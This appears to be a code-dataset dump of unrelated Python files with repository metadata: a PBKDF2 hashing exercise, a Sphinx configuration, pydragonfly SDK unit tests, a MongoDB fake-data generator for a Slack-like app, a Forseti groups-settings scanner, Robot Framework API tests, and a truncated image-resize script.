for sorted_entry in sorted_duration:
print (sorted_entry[0])
line += ',{}'.format(sorted_entry[0])
split_counts = {}
split_counts['pbsm'] = float(data[8]) if float(data[8]) > 0 else 10000
split_counts['dj'] = float(data[12]) if float(data[12]) > 0 else 10000
split_counts['repj'] = float(data[16]) if float(data[16]) > 0 else 10000
split_counts['bnlj'] = float(data[4]) if float(data[4]) > 0 else 10000
print (duration)
sorted_split_counts = sorted(split_counts.items(), key=operator.itemgetter(1))
for sorted_entry in sorted_split_counts:
print (sorted_entry[0])
line += ',{}'.format(sorted_entry[0])
output_f.writelines('{}\n'.format(line))
line = f.readline()
output_f.close()
f.close()
if __name__ == '__main__':
main()
| true
| true
|
f70790bdabc2c7fe01362649f171682a1a2e2577
| 321
|
py
|
Python
|
03 - Linux Security/q6/hashme.py
|
HirumalPriyashan/linux-training
|
6ccfe572c0d7d36cb67b685ddb5ee82b5c3667c1
|
[
"MIT"
] | 2
|
2021-09-15T14:21:26.000Z
|
2022-01-24T13:14:42.000Z
|
03 - Linux Security/q6/hashme.py
|
HirumalPriyashan/linux-training
|
6ccfe572c0d7d36cb67b685ddb5ee82b5c3667c1
|
[
"MIT"
] | null | null | null |
03 - Linux Security/q6/hashme.py
|
HirumalPriyashan/linux-training
|
6ccfe572c0d7d36cb67b685ddb5ee82b5c3667c1
|
[
"MIT"
] | null | null | null |
import sys
import hashlib
def check(args):
if len(args) != 2:
print("usage hashme.py <phrase>")
return False
return True
def main(phrase):
salt ='Km5d5ivMy8iexuHcZrsD'
hash_obj = hashlib.pbkdf2_hmac('sha512', phrase.encode(), salt.encode(), 200000)
print(hash_obj.hex())
if check(sys.argv): main(sys.argv[1])
| 21.4
| 81
| 0.71028
|
import sys
import hashlib
def check(args):
if len(args) != 2:
print("usage hashme.py <phrase>")
return False
return True
def main(phrase):
salt ='Km5d5ivMy8iexuHcZrsD'
hash_obj = hashlib.pbkdf2_hmac('sha512', phrase.encode(), salt.encode(), 200000)
print(hash_obj.hex())
if check(sys.argv): main(sys.argv[1])
| true
| true
|
f707919fa3236f64303228d43dfff91d42e6dab5
| 3,155
|
py
|
Python
|
doc/conf.py
|
mango-db/mut
|
3df98c17b0c5ea0b6101fe2c0e1b36ebdf97412e
|
[
"Apache-2.0"
] | 10
|
2017-05-09T19:38:34.000Z
|
2022-01-21T00:02:03.000Z
|
doc/conf.py
|
mango-db/mut
|
3df98c17b0c5ea0b6101fe2c0e1b36ebdf97412e
|
[
"Apache-2.0"
] | 7
|
2017-08-21T21:41:44.000Z
|
2021-11-19T18:09:13.000Z
|
doc/conf.py
|
mango-db/mut
|
3df98c17b0c5ea0b6101fe2c0e1b36ebdf97412e
|
[
"Apache-2.0"
] | 12
|
2016-10-13T14:42:50.000Z
|
2022-01-13T13:51:53.000Z
|
# -*- coding: utf-8 -*-
#
# MongoDB documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 3 09:58:40 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
import sys
import os
import datetime
from sphinx.errors import SphinxError
try:
tags
except NameError:
class Tags(object):
def has(self, *args):
return False
tags = Tags()
# -- General configuration ----------------------------------------------------
needs_sphinx = '1.0'
extensions = [
'sphinx.ext.extlinks',
'sphinx.ext.todo',
]
locale_dirs = []
gettext_compact = False
templates_path = ['.templates']
exclude_patterns = []
source_suffix = '.txt'
master_doc = 'index'
language = 'en'
project = 'mut'
copyright = u'2008-{0}'.format(datetime.date.today().year)
version = '0.1'
release = '0.1'
rst_epilog = '\n'.join([
'.. |copy| unicode:: U+000A9',
'.. |ent-build| replace:: MongoDB Enterprise',
'.. |year| replace:: {0}'.format(datetime.date.today().year),
])
pygments_style = 'sphinx'
extlinks = {
'issue': ('https://jira.mongodb.org/browse/%s', '' ),
'wiki': ('http://www.mongodb.org/display/DOCS/%s', ''),
'api': ('https://api.mongodb.org/%s', ''),
'manual': ('https://docs.mongodb.org/manual%s', ''),
'gettingstarted': ('https://docs.mongodb.org/getting-started%s', ''),
'ecosystem': ('https://docs.mongodb.org/ecosystem%s', ''),
'meta-driver': ('http://docs.mongodb.org/meta-driver/latest%s', ''),
'mms-docs': ('https://docs.cloud.mongodb.com%s', ''),
'mms-home': ('https://cloud.mongodb.com%s', ''),
'opsmgr': ('https://docs.opsmanager.mongodb.com/current%s', ''),
'about': ('https://www.mongodb.org/about%s', ''),
'products': ('https://www.mongodb.com/products%s', '')
}
languages = [
("ar", "Arabic"),
("cn", "Chinese"),
("cs", "Czech"),
("de", "German"),
("es", "Spanish"),
("fr", "French"),
("hu", "Hungarian"),
("id", "Indonesian"),
("it", "Italian"),
("jp", "Japanese"),
("ko", "Korean"),
("lt", "Lithuanian"),
("pl", "Polish"),
("pt", "Portuguese"),
("ro", "Romanian"),
("ru", "Russian"),
("tr", "Turkish"),
("uk", "Ukrainian")
]
# -- Options for HTML output ---------------------------------------------------
html_theme = 'nature'
html_title = 'Mut'
htmlhelp_basename = 'MongoDBdoc'
# html_logo = sconf.logo
html_static_path = ['_static']
html_copy_source = False
html_use_smartypants = True
html_domain_indices = True
html_use_index = True
html_split_index = False
html_show_sourcelink = False
html_show_sphinx = True
html_show_copyright = True
html_sidebars = {}
# put it into your conf.py
def setup(app):
# disable versioning for speed
from sphinx.builders.gettext import I18nBuilder
I18nBuilder.versioning_method = 'none'
def doctree_read(app, doctree):
if not isinstance(app.builder, I18nBuilder):
return
from docutils import nodes
from sphinx.versioning import add_uids
list(add_uids(doctree, nodes.TextElement))
app.connect('doctree-read', doctree_read)
| 25.443548
| 80
| 0.602219
|
import sys
import os
import datetime
from sphinx.errors import SphinxError
try:
tags
except NameError:
class Tags(object):
def has(self, *args):
return False
tags = Tags()
needs_sphinx = '1.0'
extensions = [
'sphinx.ext.extlinks',
'sphinx.ext.todo',
]
locale_dirs = []
gettext_compact = False
templates_path = ['.templates']
exclude_patterns = []
source_suffix = '.txt'
master_doc = 'index'
language = 'en'
project = 'mut'
copyright = u'2008-{0}'.format(datetime.date.today().year)
version = '0.1'
release = '0.1'
rst_epilog = '\n'.join([
'.. |copy| unicode:: U+000A9',
'.. |ent-build| replace:: MongoDB Enterprise',
'.. |year| replace:: {0}'.format(datetime.date.today().year),
])
pygments_style = 'sphinx'
extlinks = {
'issue': ('https://jira.mongodb.org/browse/%s', '' ),
'wiki': ('http://www.mongodb.org/display/DOCS/%s', ''),
'api': ('https://api.mongodb.org/%s', ''),
'manual': ('https://docs.mongodb.org/manual%s', ''),
'gettingstarted': ('https://docs.mongodb.org/getting-started%s', ''),
'ecosystem': ('https://docs.mongodb.org/ecosystem%s', ''),
'meta-driver': ('http://docs.mongodb.org/meta-driver/latest%s', ''),
'mms-docs': ('https://docs.cloud.mongodb.com%s', ''),
'mms-home': ('https://cloud.mongodb.com%s', ''),
'opsmgr': ('https://docs.opsmanager.mongodb.com/current%s', ''),
'about': ('https://www.mongodb.org/about%s', ''),
'products': ('https://www.mongodb.com/products%s', '')
}
languages = [
("ar", "Arabic"),
("cn", "Chinese"),
("cs", "Czech"),
("de", "German"),
("es", "Spanish"),
("fr", "French"),
("hu", "Hungarian"),
("id", "Indonesian"),
("it", "Italian"),
("jp", "Japanese"),
("ko", "Korean"),
("lt", "Lithuanian"),
("pl", "Polish"),
("pt", "Portuguese"),
("ro", "Romanian"),
("ru", "Russian"),
("tr", "Turkish"),
("uk", "Ukrainian")
]
html_theme = 'nature'
html_title = 'Mut'
htmlhelp_basename = 'MongoDBdoc'
html_static_path = ['_static']
html_copy_source = False
html_use_smartypants = True
html_domain_indices = True
html_use_index = True
html_split_index = False
html_show_sourcelink = False
html_show_sphinx = True
html_show_copyright = True
html_sidebars = {}
def setup(app):
from sphinx.builders.gettext import I18nBuilder
I18nBuilder.versioning_method = 'none'
def doctree_read(app, doctree):
if not isinstance(app.builder, I18nBuilder):
return
from docutils import nodes
from sphinx.versioning import add_uids
list(add_uids(doctree, nodes.TextElement))
app.connect('doctree-read', doctree_read)
| true
| true
|
f70791fca69d0f3ad4a9aa5995b5670291a02bb6
| 1,329
|
py
|
Python
|
tests/test_dragonfly.py
|
certego/pydragonfly
|
18dcbd78f07e0b6c09d536d45ba4051106c4f5a5
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_dragonfly.py
|
certego/pydragonfly
|
18dcbd78f07e0b6c09d536d45ba4051106c4f5a5
|
[
"BSD-3-Clause"
] | 15
|
2021-10-21T10:39:23.000Z
|
2022-03-29T04:19:25.000Z
|
tests/test_dragonfly.py
|
certego/pydragonfly
|
18dcbd78f07e0b6c09d536d45ba4051106c4f5a5
|
[
"BSD-3-Clause"
] | null | null | null |
from unittest.mock import patch
from pydragonfly.sdk.const import ANALYZED, MALICIOUS
from tests.mock_utils import MockAPIResponse
from tests.resources import APIResourceBaseTestCase
from tests.resources.test_analysis import AnalysisResultTestCase
class DragonflyTestCase(APIResourceBaseTestCase):
@property
def resource(self):
return self.df
@patch(
"pydragonfly.sdk.resources.analysis.Analysis.create",
return_value=MockAPIResponse({"id": 1}, 200),
)
def test_analyze_file(self, *args, **kwargs):
ret = self.df.analyze_file(
sample_name="test", sample_buffer=b"test_sample", retrieve_analysis=False
)
self.assertEqual(ret, 1)
@patch(
"pydragonfly.sdk.resources.analysis.Analysis.retrieve",
return_value=MockAPIResponse(AnalysisResultTestCase.result_json, 200),
)
@patch(
"pydragonfly.sdk.resources.report.Report.matched_rules",
return_value=MockAPIResponse(AnalysisResultTestCase.matched_rules_json, 200),
)
def test_analysis_result(self, *args, **kwargs):
result = self.df.analysis_result(12)
self.assertEqual(result.id, 12)
self.assertEqual(result.status, ANALYZED)
self.assertEqual(result.evaluation, MALICIOUS)
self.assertEqual(result.score, 10)
| 34.973684
| 85
| 0.714823
|
from unittest.mock import patch
from pydragonfly.sdk.const import ANALYZED, MALICIOUS
from tests.mock_utils import MockAPIResponse
from tests.resources import APIResourceBaseTestCase
from tests.resources.test_analysis import AnalysisResultTestCase
class DragonflyTestCase(APIResourceBaseTestCase):
@property
def resource(self):
return self.df
@patch(
"pydragonfly.sdk.resources.analysis.Analysis.create",
return_value=MockAPIResponse({"id": 1}, 200),
)
def test_analyze_file(self, *args, **kwargs):
ret = self.df.analyze_file(
sample_name="test", sample_buffer=b"test_sample", retrieve_analysis=False
)
self.assertEqual(ret, 1)
@patch(
"pydragonfly.sdk.resources.analysis.Analysis.retrieve",
return_value=MockAPIResponse(AnalysisResultTestCase.result_json, 200),
)
@patch(
"pydragonfly.sdk.resources.report.Report.matched_rules",
return_value=MockAPIResponse(AnalysisResultTestCase.matched_rules_json, 200),
)
def test_analysis_result(self, *args, **kwargs):
result = self.df.analysis_result(12)
self.assertEqual(result.id, 12)
self.assertEqual(result.status, ANALYZED)
self.assertEqual(result.evaluation, MALICIOUS)
self.assertEqual(result.score, 10)
| true
| true
|
f70791fdb2757566982298ffb1bbf9b871483305
| 5,722
|
py
|
Python
|
src/generator.py
|
Mtortolani/slack-backend
|
11b1650c111eb163a8ef3bf75a33fb4aeeccf300
|
[
"MIT"
] | null | null | null |
src/generator.py
|
Mtortolani/slack-backend
|
11b1650c111eb163a8ef3bf75a33fb4aeeccf300
|
[
"MIT"
] | null | null | null |
src/generator.py
|
Mtortolani/slack-backend
|
11b1650c111eb163a8ef3bf75a33fb4aeeccf300
|
[
"MIT"
] | null | null | null |
from email import generator
from os import listdir
from os.path import isfile, join
import numpy as np
import random
import string
from pymongo import MongoClient
from models.user import User
from models.channel import *
from models.workspace import Workspace
from models.settings import *
# Setup Mongo client
class MongoDatabase:
def __init__(self):
self.client = MongoClient("mongodb://localhost:27017/")
self.db = self.client['slack_database']
self.user_col = self.db['user_col']
self.direct_col = self.db['direct_col']
self.workspace_col = self.db['workspace_col']
class Generator:
def __init__(self):
self.mongo = MongoDatabase()
def generate_random_string(self, size: int=10):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=size))
def generate_random_number(self, size: int=9):
return random.randint(1, 10**size)
def generate_random_message(self):
words = [self.generate_random_string() for i in range(random.randint(3,10))]
return ' '.join(words)
def generate_random_user(self):
name = self.generate_random_string()
user = User(name)
settings = UserSetting()
settings.notifications = self.generate_notifications()
settings.language = self.generate_random_language()
settings.time_zone = self.generate_random_timezone()
user.settings = settings
return user
def generate_random_channel(self):
name = self.generate_random_string()
channel = Channel(name)
settings = ChannelSetting()
settings.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
settings.archive = self.generate_random_archive()
channel.settings = settings
return channel
def generate_random_direct_channel(self, n_messages: int = 10):
user_pair = [i for i in self.mongo.user_col.aggregate([{'$sample':{'size':2}}])]
dc = DirectChannel(user_pair[0], user_pair[1])
dc.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
dc.archive = self.generate_random_archive()
dc.messages = [self.generate_random_message() for _ in range(n_messages)]
settings = ChannelSetting()
settings.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
settings.archive = self.generate_random_archive()
dc.settings = settings
return dc
def generate_random_workspace(self, n_users: int = 10, n_channels: int = 10, n_msgs_per_chnl: int = 20):
workspace_name = self.generate_random_string()
workspace = Workspace(workspace_name)
workspace.member_ids = [i['user_id'] for i in self.mongo.user_col.aggregate([{'$sample':{'size':n_users}}])]
workspace.channels = [self.generate_random_channel() for _ in range(n_channels)]
for channel in workspace.channels:
channel.name = self.generate_random_string()
channel.messages = [self.generate_random_message() for _ in range(n_msgs_per_chnl)]
return workspace
# For Settings
def generate_random_language(self):
language_list = ["German","English","Spanish","French","Italian","Portuguese","Russian","Japanese","Chinese","Korean"]
return random.choice(language_list)
def generate_random_timezone(self):
timezones = ['EST', 'CST', 'MST', 'PST', 'AST', 'AKST', 'HST']
return random.choice(timezones)
def generate_notifications(self):
return bool(random.getrandbits(1))
def generate_random_archive(self):
return bool(random.getrandbits(1))
def random_data_test(user_count: int=1000, workspace_count: int=100, channel_count: int=5,
direct_channel_count: int=400, n_msgs_per_chnl: int=50):
'''
Creates a database with the given number of users, workspaces, channels in each workspace, direct channels for each user, and messages by each user
'''
g = Generator()
mongo = MongoDatabase()
# make users
for _ in range(user_count):
user = g.generate_random_user()
mongo.user_col.insert_one({
'user_id': user.user_id,
'name': user.name,
'settings': {'notifications': user.settings.notifications,
'language': user.settings.language,
'time_zone': user.settings.time_zone}})
# make direct channels with messages
for _ in range(direct_channel_count):
dc = g.generate_random_direct_channel(n_msgs_per_chnl)
mongo.direct_col.insert_one({'member_ids': list(dc.member_ids), # NOTE: CHANGING FROM SET To LIST
'messages': dc.messages,
'settings':{'censored_words': list(dc.settings.censored_words), # NOTE: CHANGING FROM SET To LIST
'archive': dc.settings.archive}})
# make workspaces with members and channels and messages
for _ in range(workspace_count):
workspace = g.generate_random_workspace(10, channel_count, n_msgs_per_chnl)
mongo.workspace_col.insert_one({'name':workspace.name,
'members':workspace.member_ids,
'channels': {channel.name: channel.messages for channel in workspace.channels},})
# TODO: Inesrt settings into workspace channels
def main():
mongo = MongoDatabase()
mongo.client.drop_database('slack_database')
random_data_test()
if __name__ == '__main__':
main()
| 41.165468
| 151
| 0.653792
|
from email import generator
from os import listdir
from os.path import isfile, join
import numpy as np
import random
import string
from pymongo import MongoClient
from models.user import User
from models.channel import *
from models.workspace import Workspace
from models.settings import *
class MongoDatabase:
def __init__(self):
self.client = MongoClient("mongodb://localhost:27017/")
self.db = self.client['slack_database']
self.user_col = self.db['user_col']
self.direct_col = self.db['direct_col']
self.workspace_col = self.db['workspace_col']
class Generator:
def __init__(self):
self.mongo = MongoDatabase()
def generate_random_string(self, size: int=10):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=size))
def generate_random_number(self, size: int=9):
return random.randint(1, 10**size)
def generate_random_message(self):
words = [self.generate_random_string() for i in range(random.randint(3,10))]
return ' '.join(words)
def generate_random_user(self):
name = self.generate_random_string()
user = User(name)
settings = UserSetting()
settings.notifications = self.generate_notifications()
settings.language = self.generate_random_language()
settings.time_zone = self.generate_random_timezone()
user.settings = settings
return user
def generate_random_channel(self):
name = self.generate_random_string()
channel = Channel(name)
settings = ChannelSetting()
settings.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
settings.archive = self.generate_random_archive()
channel.settings = settings
return channel
def generate_random_direct_channel(self, n_messages: int = 10):
user_pair = [i for i in self.mongo.user_col.aggregate([{'$sample':{'size':2}}])]
dc = DirectChannel(user_pair[0], user_pair[1])
dc.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
dc.archive = self.generate_random_archive()
dc.messages = [self.generate_random_message() for _ in range(n_messages)]
settings = ChannelSetting()
settings.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
settings.archive = self.generate_random_archive()
dc.settings = settings
return dc
def generate_random_workspace(self, n_users: int = 10, n_channels: int = 10, n_msgs_per_chnl: int = 20):
workspace_name = self.generate_random_string()
workspace = Workspace(workspace_name)
workspace.member_ids = [i['user_id'] for i in self.mongo.user_col.aggregate([{'$sample':{'size':n_users}}])]
workspace.channels = [self.generate_random_channel() for _ in range(n_channels)]
for channel in workspace.channels:
channel.name = self.generate_random_string()
channel.messages = [self.generate_random_message() for _ in range(n_msgs_per_chnl)]
return workspace
def generate_random_language(self):
language_list = ["German","English","Spanish","French","Italian","Portuguese","Russian","Japanese","Chinese","Korean"]
return random.choice(language_list)
def generate_random_timezone(self):
timezones = ['EST', 'CST', 'MST', 'PST', 'AST', 'AKST', 'HST']
return random.choice(timezones)
def generate_notifications(self):
return bool(random.getrandbits(1))
def generate_random_archive(self):
return bool(random.getrandbits(1))
def random_data_test(user_count: int=1000, workspace_count: int=100, channel_count: int=5,
direct_channel_count: int=400, n_msgs_per_chnl: int=50):
g = Generator()
mongo = MongoDatabase()
for _ in range(user_count):
user = g.generate_random_user()
mongo.user_col.insert_one({
'user_id': user.user_id,
'name': user.name,
'settings': {'notifications': user.settings.notifications,
'language': user.settings.language,
'time_zone': user.settings.time_zone}})
for _ in range(direct_channel_count):
dc = g.generate_random_direct_channel(n_msgs_per_chnl)
mongo.direct_col.insert_one({'member_ids': list(dc.member_ids), 'messages': dc.messages,
'settings':{'censored_words': list(dc.settings.censored_words), 'archive': dc.settings.archive}})
for _ in range(workspace_count):
workspace = g.generate_random_workspace(10, channel_count, n_msgs_per_chnl)
mongo.workspace_col.insert_one({'name':workspace.name,
'members':workspace.member_ids,
'channels': {channel.name: channel.messages for channel in workspace.channels},})
def main():
mongo = MongoDatabase()
mongo.client.drop_database('slack_database')
random_data_test()
if __name__ == '__main__':
main()
| true
| true
|
f7079305ae82d491841a452c63bc1084747dc7d0
| 6,620
|
py
|
Python
|
google/cloud/forseti/scanner/scanners/groups_settings_scanner.py
|
darrellkuhn/forseti-security
|
b54faf68d869842e8a43472ff980e28e2ce8d3c6
|
[
"Apache-2.0"
] | null | null | null |
google/cloud/forseti/scanner/scanners/groups_settings_scanner.py
|
darrellkuhn/forseti-security
|
b54faf68d869842e8a43472ff980e28e2ce8d3c6
|
[
"Apache-2.0"
] | 1
|
2020-11-10T22:15:54.000Z
|
2020-11-10T22:15:54.000Z
|
google/cloud/forseti/scanner/scanners/groups_settings_scanner.py
|
darrellkuhn/forseti-security
|
b54faf68d869842e8a43472ff980e28e2ce8d3c6
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Scanner for the GroupsSettings rules engine."""
import json
from google.cloud.forseti.common.gcp_type import groups_settings
from google.cloud.forseti.common.util import logger
from google.cloud.forseti.scanner.audit import groups_settings_rules_engine
from google.cloud.forseti.scanner.scanners import base_scanner
LOGGER = logger.get_logger(__name__)
class GroupsSettingsScanner(base_scanner.BaseScanner):
"""Scanner for GroupsSettings data."""
def __init__(self, global_configs, scanner_configs, service_config,
model_name, snapshot_timestamp, rules):
"""Initialization.
Args:
global_configs (dict): Global configurations.
scanner_configs (dict): Scanner configurations.
service_config (ServiceConfig): Forseti 2.0 service configs
model_name (str): name of the data model
snapshot_timestamp (str): Timestamp, formatted as YYYYMMDDTHHMMSSZ.
rules (str): Fully-qualified path and filename of the rules file.
"""
super(GroupsSettingsScanner, self).__init__(
global_configs,
scanner_configs,
service_config,
model_name,
snapshot_timestamp,
rules)
self.rules_engine = (groups_settings_rules_engine.
GroupsSettingsRulesEngine(
rules_file_path=self.rules,
snapshot_timestamp=self.snapshot_timestamp))
self.rules_engine.build_rule_book(self.global_configs)
@staticmethod
def _flatten_violations(violations):
"""Flatten RuleViolations into a dict for each RuleViolation member.
Args:
violations (list): The RuleViolations to flatten.
Yields:
dict: Iterator of RuleViolations as a dict per member.
"""
for violation in violations:
resource_data = {
'whoCanAdd': violation.whoCanAdd,
'whoCanJoin': violation.whoCanJoin,
'whoCanViewMembership': violation.whoCanViewMembership,
'whoCanViewGroup': violation.whoCanViewGroup,
'whoCanInvite': violation.whoCanInvite,
'allowExternalMembers': violation.allowExternalMembers,
'whoCanLeaveGroup': violation.whoCanLeaveGroup,
}
yield {
'resource_id': violation.group_email,
'full_name': violation.group_email,
'resource_name': violation.group_email,
'resource_data': json.dumps(resource_data, sort_keys=True),
'violation_data': violation.violation_reason,
'resource_type': violation.resource_type,
'rule_index': violation.rule_index,
'rule_name': violation.rule_name,
'violation_type': violation.violation_type,
}
def _output_results(self, all_violations):
"""Output results.
Args:
all_violations (list): All violations.
"""
all_violations = list(self._flatten_violations(all_violations))
self._output_results_to_db(all_violations)
def _find_violations(self, all_groups_settings, iam_groups_settings):
"""Find violations in the settings.
Args:
all_groups_settings (list): GroupsSettings list to find violations
in.
iam_groups_settings (list): GroupsSettings list for only those
groups settings that have at least 1 iam policy, to find violations
in.
Returns:
list: All violations.
"""
all_violations = []
LOGGER.info('Finding groups settings violations...')
for settings in all_groups_settings:
violations = self.rules_engine.find_violations(settings,
iam_only=False)
LOGGER.debug(violations)
all_violations.extend(violations)
for settings in iam_groups_settings:
violations = self.rules_engine.find_violations(settings,
iam_only=True)
LOGGER.debug(violations)
all_violations.extend(violations)
return all_violations
def _retrieve(self):
"""Runs the data collection.
Returns:
tupl: 2 lists of GroupsSettings objects, 1 only for settings that
have iam policies and 1 with all groups settings.
Raises:
ValueError: if resources have an unexpected type.
"""
all_groups_settings = []
iam_groups_settings = []
model_manager = self.service_config.model_manager
scoped_session, data_access = model_manager.get(self.model_name)
with scoped_session as session:
for settings in data_access.scanner_fetch_groups_settings(session,
True):
email = settings[0].split('group/')[1]
iam_groups_settings.append(groups_settings.GroupsSettings
.from_json(email, settings[1]))
for settings in data_access.scanner_fetch_groups_settings(session,
False):
email = settings[0].split('group/')[1]
all_groups_settings.append(groups_settings.GroupsSettings
.from_json(email, settings[1]))
return (all_groups_settings, iam_groups_settings)
def run(self):
"""Run, the entry point for this scanner."""
all_groups_settings, iam_groups_settings = self._retrieve()
all_violations = self._find_violations(all_groups_settings,
iam_groups_settings)
self._output_results(all_violations)
| 40.613497
| 79
| 0.616465
|
import json
from google.cloud.forseti.common.gcp_type import groups_settings
from google.cloud.forseti.common.util import logger
from google.cloud.forseti.scanner.audit import groups_settings_rules_engine
from google.cloud.forseti.scanner.scanners import base_scanner
LOGGER = logger.get_logger(__name__)
class GroupsSettingsScanner(base_scanner.BaseScanner):
def __init__(self, global_configs, scanner_configs, service_config,
model_name, snapshot_timestamp, rules):
super(GroupsSettingsScanner, self).__init__(
global_configs,
scanner_configs,
service_config,
model_name,
snapshot_timestamp,
rules)
self.rules_engine = (groups_settings_rules_engine.
GroupsSettingsRulesEngine(
rules_file_path=self.rules,
snapshot_timestamp=self.snapshot_timestamp))
self.rules_engine.build_rule_book(self.global_configs)
@staticmethod
def _flatten_violations(violations):
for violation in violations:
resource_data = {
'whoCanAdd': violation.whoCanAdd,
'whoCanJoin': violation.whoCanJoin,
'whoCanViewMembership': violation.whoCanViewMembership,
'whoCanViewGroup': violation.whoCanViewGroup,
'whoCanInvite': violation.whoCanInvite,
'allowExternalMembers': violation.allowExternalMembers,
'whoCanLeaveGroup': violation.whoCanLeaveGroup,
}
yield {
'resource_id': violation.group_email,
'full_name': violation.group_email,
'resource_name': violation.group_email,
'resource_data': json.dumps(resource_data, sort_keys=True),
'violation_data': violation.violation_reason,
'resource_type': violation.resource_type,
'rule_index': violation.rule_index,
'rule_name': violation.rule_name,
'violation_type': violation.violation_type,
}
def _output_results(self, all_violations):
all_violations = list(self._flatten_violations(all_violations))
self._output_results_to_db(all_violations)
def _find_violations(self, all_groups_settings, iam_groups_settings):
all_violations = []
LOGGER.info('Finding groups settings violations...')
for settings in all_groups_settings:
violations = self.rules_engine.find_violations(settings,
iam_only=False)
LOGGER.debug(violations)
all_violations.extend(violations)
for settings in iam_groups_settings:
violations = self.rules_engine.find_violations(settings,
iam_only=True)
LOGGER.debug(violations)
all_violations.extend(violations)
return all_violations
def _retrieve(self):
all_groups_settings = []
iam_groups_settings = []
model_manager = self.service_config.model_manager
scoped_session, data_access = model_manager.get(self.model_name)
with scoped_session as session:
for settings in data_access.scanner_fetch_groups_settings(session,
True):
email = settings[0].split('group/')[1]
iam_groups_settings.append(groups_settings.GroupsSettings
.from_json(email, settings[1]))
for settings in data_access.scanner_fetch_groups_settings(session,
False):
email = settings[0].split('group/')[1]
all_groups_settings.append(groups_settings.GroupsSettings
.from_json(email, settings[1]))
return (all_groups_settings, iam_groups_settings)
def run(self):
all_groups_settings, iam_groups_settings = self._retrieve()
all_violations = self._find_violations(all_groups_settings,
iam_groups_settings)
self._output_results(all_violations)
| true
| true
|
f7079479714dd2df0cbf8ce1a4319bd654929be3
| 1,638
|
py
|
Python
|
utest/api/test_exposed_api.py
|
moto-timo/robotframework
|
1a26bfc77ea295e298175cd665b5aee0dcbb6699
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
utest/api/test_exposed_api.py
|
moto-timo/robotframework
|
1a26bfc77ea295e298175cd665b5aee0dcbb6699
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
utest/api/test_exposed_api.py
|
moto-timo/robotframework
|
1a26bfc77ea295e298175cd665b5aee0dcbb6699
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import unittest
from os.path import abspath, join
from robot import api, model, parsing, reporting, result, running
from robot.utils.asserts import assert_equals
class TestExposedApi(unittest.TestCase):
def test_test_case_file(self):
assert_equals(api.TestCaseFile, parsing.TestCaseFile)
def test_test_data_directory(self):
assert_equals(api.TestDataDirectory, parsing.TestDataDirectory)
def test_resource_file(self):
assert_equals(api.ResourceFile, parsing.ResourceFile)
def test_test_data(self):
assert_equals(api.TestData, parsing.TestData)
def test_execution_result(self):
assert_equals(api.ExecutionResult, result.ExecutionResult)
def test_test_suite(self):
assert_equals(api.TestSuite, running.TestSuite)
def test_result_writer(self):
assert_equals(api.ResultWriter, reporting.ResultWriter)
def test_visitors(self):
assert_equals(api.SuiteVisitor, model.SuiteVisitor)
assert_equals(api.ResultVisitor, result.ResultVisitor)
class TestTestSuiteBuilder(unittest.TestCase):
sources = [join(abspath(__file__), '..', '..', '..', 'atest', 'testdata', 'misc', n)
for n in ('pass_and_fail.robot', 'normal.robot')]
def test_create_with_datasources_as_list(self):
suite = api.TestSuiteBuilder().build(*self.sources)
assert_equals(suite.name, 'Pass And Fail & Normal')
def test_create_with_datasource_as_string(self):
suite = api.TestSuiteBuilder().build(self.sources[0])
assert_equals(suite.name, 'Pass And Fail')
if __name__ == '__main__':
unittest.main()
| 30.90566
| 88
| 0.721001
|
import unittest
from os.path import abspath, join
from robot import api, model, parsing, reporting, result, running
from robot.utils.asserts import assert_equals
class TestExposedApi(unittest.TestCase):
def test_test_case_file(self):
assert_equals(api.TestCaseFile, parsing.TestCaseFile)
def test_test_data_directory(self):
assert_equals(api.TestDataDirectory, parsing.TestDataDirectory)
def test_resource_file(self):
assert_equals(api.ResourceFile, parsing.ResourceFile)
def test_test_data(self):
assert_equals(api.TestData, parsing.TestData)
def test_execution_result(self):
assert_equals(api.ExecutionResult, result.ExecutionResult)
def test_test_suite(self):
assert_equals(api.TestSuite, running.TestSuite)
def test_result_writer(self):
assert_equals(api.ResultWriter, reporting.ResultWriter)
def test_visitors(self):
assert_equals(api.SuiteVisitor, model.SuiteVisitor)
assert_equals(api.ResultVisitor, result.ResultVisitor)
class TestTestSuiteBuilder(unittest.TestCase):
sources = [join(abspath(__file__), '..', '..', '..', 'atest', 'testdata', 'misc', n)
for n in ('pass_and_fail.robot', 'normal.robot')]
def test_create_with_datasources_as_list(self):
suite = api.TestSuiteBuilder().build(*self.sources)
assert_equals(suite.name, 'Pass And Fail & Normal')
def test_create_with_datasource_as_string(self):
suite = api.TestSuiteBuilder().build(self.sources[0])
assert_equals(suite.name, 'Pass And Fail')
if __name__ == '__main__':
unittest.main()
| true
| true
|
f707956a41547e296589d686b077ac113a8ab01e
| 537
|
py
|
Python
|
images/thumbs/resize.py
|
GiulioC/GiulioC.github.io
|
8c73c3492682a2830f3552d71b12e5671370a5f4
|
[
"CC-BY-3.0"
] | null | null | null |
images/thumbs/resize.py
|
GiulioC/GiulioC.github.io
|
8c73c3492682a2830f3552d71b12e5671370a5f4
|
[
"CC-BY-3.0"
] | null | null | null |
images/thumbs/resize.py
|
GiulioC/GiulioC.github.io
|
8c73c3492682a2830f3552d71b12e5671370a5f4
|
[
"CC-BY-3.0"
] | null | null | null |
from PIL import Image
import os
percent = 0.5
for file_name in os.listdir("../foto/"):
if file_name == "pic8.jpg":
